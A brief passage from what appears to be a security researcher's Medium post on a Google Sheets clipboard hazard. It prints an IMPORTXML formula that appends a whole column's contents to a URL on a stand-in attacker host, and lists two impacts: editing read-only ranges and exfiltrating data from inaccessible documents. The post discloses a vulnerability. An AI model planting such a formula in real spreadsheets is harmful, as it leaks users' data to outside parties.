Clipboard hazard with Google Sheets

=IMPORTXML(CONCAT("https://attacker.controller.path/";CONCATENATE($C:$C)); "/root")
  • #1: modify range(s) of a document where he/she has only read-only access. Full control over the content.
  • #2: exfiltrate data from a document that the attacker has no access to (but knows the ID of the document).

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Imre Rad

Imre Rad

Software developer daytime, security researcher in freetime